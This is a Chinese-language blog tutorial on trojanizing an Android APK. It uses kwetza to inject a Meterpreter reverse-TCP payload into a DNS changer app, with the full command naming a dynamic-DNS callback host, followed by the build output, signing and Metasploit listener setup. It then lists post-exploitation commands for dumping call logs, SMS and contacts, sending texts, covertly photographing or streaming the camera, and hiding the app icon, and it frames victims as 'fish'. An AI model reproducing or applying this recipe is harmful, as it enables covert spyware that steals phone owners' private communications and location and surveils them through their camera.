• 推荐使用最新版火狐浏览器和Chrome浏览器访问本网站
  • 欢迎访问泽同学的网站,网络空间安全,python脚本 , 工具库,欢迎加入泽同学的小屋 QQ群
  • 当然也欢迎大家来到我的心情博客来玩呀~,推荐一个视频网站
  • 感觉网站还不错的可以来加QQ一起玩呀,有不错的资料可以联系我,可以出稿费哦~
  • 推荐使用最新版火狐浏览器和Chrome浏览器访问本网站
  • 如果您觉得本站非常有看点,那么赶紧使用Ctrl+D 收藏泽同学的博客吧

Apk插入后门

推荐 小驴 2年前 (2018-11-02) 464次浏览 0个评论 扫描二维码

下载好需要插入后门的安卓app(apk)然后放入下载好的kwetza文件的目录下

这个是我的花生壳的配置。内网穿透需要6rmb(破产啊QAQ)永久使用 不过有一个月1gb的流量上限   不想搞什么大动作的就内网玩玩就行,免的进去了

Apk插入后门

制作签名证书。因为安卓的软件需要签名不然无法安装

keytool -genkey -alias android.keystore -keyalg RSA -validity 20000 -keystore android.keystore

然后随便填,但是最后一项密码别忘记了。

 

然后把产生的签名文件,后缀为.keystore给重命名为mykey.keystore

把他放入/kwetza/payload文件中替换掉原有的文件,因为原有的不知道密码

 

之后如图

Apk插入后门Apk插入后门

dnsxiugai.apk是需要插入后门的apk文件,kwetza.py用python运行 因为我们装的是android/meterpreter/reverse_tcp所以填tcp好像还有一个http没弄,有兴趣自己弄。 2d2500u518.iok.la为ip地址,这里为用的是花生壳所以有所改变如果只是内网玩玩的话就输入自己的内网ip注意不是别人的ip    13565为接收(监听)端口,yes为替换掉文件原有权限,填no的话没有权限,后门也就没有意义了,  com.burakgon.dnschanger.DNSChanger需要用到其他应用来获得

如下使用apktool来反编译需要插入后门的apk包

 

apktool   d   dnsxiugai.apk

Apk插入后门

然后会多出来一个没有apk后缀的文件夹 就是反编译出来的apk

Apk插入后门

进入dnsxiugai

然后打开AndroidManifest.xml

Apk插入后门

然后找到application标签下的android:name中的字符串  就是我们需要的

 

然后直接回车就会生成已经插入后门的apk了

如果没有其他的意外

正常的输出是这样的

 

root@kali:/wang/kwetza# python kwetza.py dnsxiugai.apk tcp  2d2500u518.iok.la 13565 yes com.burakgon.dnschanger.DNSChanger

                                           _                  _              ___    ___ 

                                          | |                | |            |__ \  / _ \

 _ __ ___  _ __ ___  _ __ ___  _ __ ___   | | ____      _____| |_ ______ _     ) || | | |

| '_ ` _ \| '_ ` _ \| '_ ` _ \| '_ ` _ \  | |/ /\ \ /\ / / _ \ __|_  / _` |   / / | | | |

| | | | | | | | | | | | | | | | | | | | | |   <  \ V  V /  __/ |_ / / (_| |  / /_ | |_| |

|_| |_| |_|_| |_| |_|_| |_| |_|_| |_| |_| |_|\_\  \_/\_/ \___|\__/___\__,_| |____(_)___/




[*] DECOMPILING TARGET APK

[+] ENDPOINT IP: 2d2500u518.iok.la

[+] ENDPOINT PORT: 13565

[+] APKTOOL DECOMPILED SUCCESS

[*] BYTING TCP COMMS

[*] ANALYZING ANDROID MANIFEST

[*] USING CUSTOM ACTIVITY: com.burakgon.dnschanger.DNSChanger

[*] PREPARING PAYLOADS

[*] INJECTING INTO APK

[+] CHECKING IF ADDITIONAL PERMS TO BE ADDED

[*] INJECTION OF CRAZY PERMISSIONS TO BE DONE!

[+] TIME TO BUILD INFECTED APK...

[*] EXECUTING APKTOOL BUILD COMMAND...

[+] BUILD RESULT

#####################################

I: Using Apktool 2.3.3-dirty

I: Checking whether sources has changed...

I: Smaling smali folder into classes.dex...

I: Checking whether resources has changed...

I: Copying raw resources...

I: Building apk file...

I: Copying unknown files/dir...

I: Built apk...




#####################################

[*] EXECUTING JARSIGNER COMMAND...

输入密钥库的密码短语: 123456

[+] JARSIGNER RESULT

#####################################

jar 已签名。




警告:

签名者证书为自签名证书。

为 -sigalg 选项指定的 MD5withRSA 算法被视为存在安全风险。

未提供 -tsa 或 -tsacert, 此 jar 没有时间戳。如果没有时间戳, 则在签名者证书的到期日期 (2079-08-27) 之后, 用户可能无法验证此 jar。




#####################################




[+] L00t located at /wang/kwetza/dnsxiugai/dist/dnsxiugai.apk

 

 

最下面一行/wang/kwetza/dnsxiugai/dist/dnsxiugai.apk就是插入后门过的apk

 

 

之后打开msfconsole设置模块和荷载头

Apk插入后门

set上自己的ip和插入后门时所填写的端口

Apk插入后门

最后输入exploit –j –z 等待鱼儿。当然也可以自己安装 自己测试一下

 

成功连接是这样滴

Apk插入后门

 

接下来就是这模块的使用命令。我也不是很清楚。只知道一些。有知道的麻烦私聊偷偷告诉我谢谢hhhhhg

sysinfo查看手机基本信息

check_root查看是否有root权限

wlan_geolocate查看手机大概位置(不清楚。。。试过的跟我说下感受)

 

dump_calllog 下载手机通话记录

dump_sms下载手机短信

dump_contacts 下载联系人列表

send_sms用他的手机号发送短信

webcam_stream打开摄像头

webcam_list查看手机摄影头有几个

webcam_snap 隐秘拍照功能(不清楚。。。试过的跟我说下感受)

 

hide_app_icon 隐藏应用程序图标从启动器 (不清楚。。。试过的跟我说下感受)

 

interval_collect  Manage interval collection capabilities

set_audio_mode    Set Ringer Mode

wakelock          Enable/Disable Wakelock

这三条不懂。求英语大佬翻译。。

 

修改壁纸

msf > use post/multi/manage/set_wallpaper

msf post (set_wallpaper)>set WALLPAPER_FILE  /root/Desktop/hack.jpg

msf post (set_wallpaper)>set session 1

msf post (set_wallpaper)>exploit

这个也没试过

 

 

最后吐槽一下backdoor-apk为什么偏偏我不能使用????

 

 


泽同学 , 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明原文链接:Apk插入后门
喜欢 (4)
[略略]
分享 (0)
小驴
关于作者:
卢本伟。!!!
发表我的评论
取消评论

表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址